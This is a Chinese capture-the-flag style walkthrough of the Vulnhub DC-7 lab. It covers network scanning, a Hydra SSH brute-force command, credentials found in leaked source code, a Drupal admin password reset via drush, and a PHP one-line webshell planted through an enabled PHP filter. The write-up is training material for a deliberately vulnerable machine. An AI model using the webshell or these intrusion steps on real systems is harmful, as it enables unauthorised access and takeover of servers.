当前位置：首页 > news >正文

Vulnhub靶机渗透：DC-7打靶记录

news 2025/8/25 2:03:18

前言

自信自强，来自于不怕苦、不怕难的积淀。宝剑锋从磨砺出，梅花香自苦寒来；任何美好理想，都离不开筚路蓝缕、手胼足胝的艰苦奋斗！

靶场介绍

DC-7是一个初中级的靶场，需要具备以下前置知识：

基础的Linux命令及操作（arp，whatweb…）
基础的渗透测试工具使用（Kali自带的工具，eg：Hydra，MSF…）
Linux系统提权知识

友情提示：

该靶场只需要简单的下载，解压，打开并将其导入到VMware即可；应该将其网络配置为NAT模式，保证机器与kali在同一个网段下，方便操作

1651799646_6274765e0f7dcacdd7c0e.png!small?1651799646134

DC7小提示：

If you need to resort to brute forcing or dictionary attacks, you probably won’t succeed.What you will need to do, is to think “outside” of the box.Waaaaaay “outside” of the box.The ultimate goal of this challenge is to get root and to read the one and only flag.

翻译：如果需要诉诸蛮力或者字典攻击，很可能不会成功。你需要做的是跳出框框去思考。在盒子外面，这项挑战的最终目标是找到根并读取唯一的flag。

信息收集

因为是靶机环境，所以无法模拟真实的"实战"环境；所以假设"目标"是一个局域网内的主机；为了确定"域控DC",我们可以通过kali中的arp-scan来探测域环境；最后以namp等端口扫描器进行端口判定

1651799740_627476bce756e93f50c5d.png!small?1651799743537

因为我只开了两台虚拟机，所以非常容易的通过arp命令就找到了CD靶机的IP地址

arp-scan -l  nmap -sS IP

友情提示：namp扫描时建议使用nmap -sS IP（nmap -p IP容易引发网站崩溃和警报）如果你的系统不是linux那你可以考虑下载nmap图形化界面，有利于初学者

下一步通过访问80端口与22端口；确定在哪个端口进行打点；我们通过访问80端口可以发现左下角，存在一些信息泄露（页面不同是因为我已经登录成功所导致的）

1651799773_627476dda91f6445789a8.png!small?1651799774354

补充：我们可以发现@DC7USER，可能存在敏感信息泄露

22端口：我们尝试使用Hydar对ssh的22端口进行暴力破解，最终破解失败

hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip sshhydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

所以通过端口访问，我们从80端口进行突破；首先可以通过Wappalyzer这款插件进行信息收集；但是因为笔者kali没有下载，所以只能使用kali自带的whatweb进行信息收集（使用方法：whatweb -v IP）

1651799822_6274770e6886ae335a275.png!small?1651799823193

使用whatweb探查结果如下所示：

1651799843_627477233b70e3a2ac965.png!small?1651799846536

然后祭出"MSF",但是可惜并没有可以利用的漏洞，但是我们根据"敏感信息"发现该靶场存在源代码泄露；通过谷歌（百度也可以）搜索"@DC7USER"关键词，找到源代码

1651799861_627477354bae505cf1ffe.png!small?1651799861551

更据提示信息发现 config.php文件（ config.php文件读里可能存在配置文件信息…），与此同时我们发现了数据库密码

1651799918_6274776eb6bec448dfa34.png!small?1651799918941

1651799934_6274777e062efbe0c2d34.png!small?1651799935099

通过连接我们发现该数据库连接不上，但是我们的ssh却可以通过该密码连接成功！

1651799955_627477932fef82b5d445a.png!small?1651799956263

打点

1651800168_62747868e85c309b7001c.png!small?1651800172633 因此我们可以使用ls命令，探测文件目录；在通过cat mbox查看文件配置和敏感信息与文件路径…

1651800148_62747854635473f381d0f.png!small?1651800151103

通过仔细的观察发现/opt/scripts（定时任务）的路径存在root的使用权限；我们首先通过cd /opt/scripts跳转到该目录；在使用ls查询，最后使用ls -l查看该文件夹是否有写入权限；如果我们获得了该文件的写入权限，就可以写入shell，然后依靠任务使用root去执行shell。但是我们发现该文件并没写入权限；于是通过cd 命令，去寻找其他漏洞；我们发现可以在/var/www/html目录下使用drush命令；于是可以我们更改网页的登录密码；代码如下：

cd /var/www/htmldrush user-password admin --password="123"

通过"success"我们可以知道，密码更改成功！尝试登陆网站！

提权

通过输入修改后的密码，成功登录网站后台。

1651800100_627478240ee5aaea74a8d.png!small?1651800100396

我们接着开始寻找"一句话木马"的写入点,我们发现content可能存在上传点

1651800077_6274780ddbe278483c11e.png!small?1651800078200

1651800047_627477efd7154b0282668.png!small?1651800048176

但是大多数上传点无法使用php，但是通过Extand可以安装php环境

1651800023_627477d7ca0c7445a8932.png!small?1651800024030

安装成功！这时我们就可以通过该环境上传webshell！

这次我们使用网上常用的PHP一句话木马，建议有条件的可以对木马进行免杀处理（当然也可以使用PHP反弹shell的方式进行攻击）

<?php@preg_replace("/[email]/e",$_POST['123'],"error");?>

1651799988_627477b4134c0e951dbd5.png!small?1651799988472

注意text format的格式改为PHP，即可通过图形化页面进行连接，进而获得flag！

查看全文

http://www.lryc.cn/news/321957.html

目标检测---IOU计算详细解读(IoU、GIoU、DIoU、CIoU、EIOU、Focal-EIOU、SIOU、WIOU)

探索并发编程：深入理解线程池

html5cssjs代码 023 公制计量单位进位与换算表

UE5.3 StateTree使用实践

【09】进阶JavaScript事件循环Promise

蓝桥备赛----基本语法总结

基于 Echarts + Python Flask ，我搭建了一个动态实时大屏监管系统

针对教育行业的网络安全方案有哪些

C++ 编程入门指南：深入了解 C++ 语言及其应用领域

latex变量上下加自适应长度箭头

鸿蒙4.0ArkUI快速入门（一）应用模型

C++ UML类图

Java SE入门及基础（44）

基于Wechaty的微信机器人

【C++ leetcode】双指针问题（续）

51单片机-蜂鸣器

【MySQL】学习和总结使用列子查询查询员工工资信息

突破编程_C++_STL教程（ stack 的实战应用）

Spring Data访问Elasticsearch----其他Elasticsearch操作支持

代码随想录算法训练营第60天 | 84.柱状图中最大的矩形

【讲解Node.js常用的命令】进阶版

软考81-上午题-【面向对象技术3-设计模式】-行为型设计模式01

【Linux进阶之路】HTTPS = HTTP + S

51-31 CVPR’24 | VastGaussian，3D高斯大型场景重建

GPT-4引领AI新纪元，Claude3、Gemini、Sora能否跟上步伐？

图书馆RFID（射频识别）数据模型压缩/解压缩算法实现小工具

【Java Web基础】一些网页设计基础（三）

2 使用GPU理解并行计算

Android什么情况下会出现内存泄漏以及怎么解决？

kafka集群介绍及搭建

前言

靶场介绍

**信息收集 **

**打点 **

**提权 **

相关文章：

信息收集

打点

提权